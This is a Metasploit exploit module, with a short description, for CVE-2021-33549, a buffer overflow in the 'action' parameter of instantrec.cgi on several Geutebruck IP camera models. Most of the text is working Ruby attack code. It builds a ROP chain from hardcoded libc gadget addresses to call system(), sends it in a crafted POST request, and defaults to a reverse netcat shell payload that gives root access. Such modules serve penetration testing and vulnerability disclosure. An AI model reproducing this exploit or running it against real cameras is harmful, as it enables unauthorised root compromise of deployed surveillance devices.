Geutebruck instantrec Remote Command Execution

This Metasploit module exploits a buffer overflow within the 'action' parameter of the /uapi-cgi/instantrec.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions equal to 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user.


MD5 | d9314dc3eccdf88cc68ce0fe7246fa85

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Geutebruck instantrec Remote Command Execution',
'Description' => %q{
This module exploits a buffer overflow within the 'action'
parameter of the /uapi-cgi/instantrec.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,
ETHC-22xx, and EWPC-22xx devices running firmware versions == 1.12.0.27 as well as firmware
versions 1.12.13.2 and 1.12.14.5.
Successful exploitation results in remote code execution as the root user.
},

'Author' => [
'Titouan Lazard - RandoriSec', # Discovery
'Ibrahim Ayadhi - RandoriSec' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2021-33549'],
['URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
['URL', 'http://geutebruck.com'],
['URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
],
'DisclosureDate' => '2021-07-08',
'Privileged' => true,
'Platform' => %w[unix linux],
'Arch' => [ARCH_ARMLE],
'Targets' => [
['Automatic Target', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
},
'Notes' => {
'Stability' => ['CRASH_SAFE'],
'Reliability' => ['REPEATABLE_SESSION'],
'SideEffects' => ['ARTIFACTS_ON_DISK']
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'The path to the instantrec page', '/uapi-cgi/instantrec.cgi'])
]
)
end

def write_payload
# gadgets
libc_add = 0x402da000
system_off = 0x00357fc
libc_data_off = 0x12c960
str_r1_off = 0x0006781c # str r0 into r4 + 0x14; pop r4 pc;
pop_r0_off = 0x00101de4 # pop r0 pc
pop_r1_off = 0x0010252c # pop r1 pc
pop_r4_off = 0x00015164 # pop r4 pc
system_ = libc_add + system_off
str_r1 = libc_add + str_r1_off
pop_r0 = libc_add + pop_r0_off
pop_r1 = libc_add + pop_r1_off
pop_r4 = libc_add + pop_r4_off
add_str = libc_data_off + libc_add + 4
chunks = (payload.raw + ' ' * (4 - payload.raw.length % 4)).unpack('I<*')
rop = []
rop += [pop_r4]
rop += [add_str - 0x14]
chunks.each_with_index do |chunk, index|
rop += [pop_r1]
rop += [chunk]
rop += [str_r1]
rop += if index != (chunks.length - 1)
[add_str - 0x14 + ((index + 1) * 4)]
else
[0x41414141]
end
end
rop += [pop_r0]
rop += [add_str]
rop += [system_]
rop.pack('V*')
end

def exploit
print_status("#{rhost}:#{rport} - Attempting to exploit...")
pad_size = 536
data = Rex::Text.pattern_create(pad_size) + write_payload
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri('/', Rex::Text.rand_hostname, '../', target_uri.path),
'vars_post' => {
'action' => data
}
)
handler
end
end

Related Posts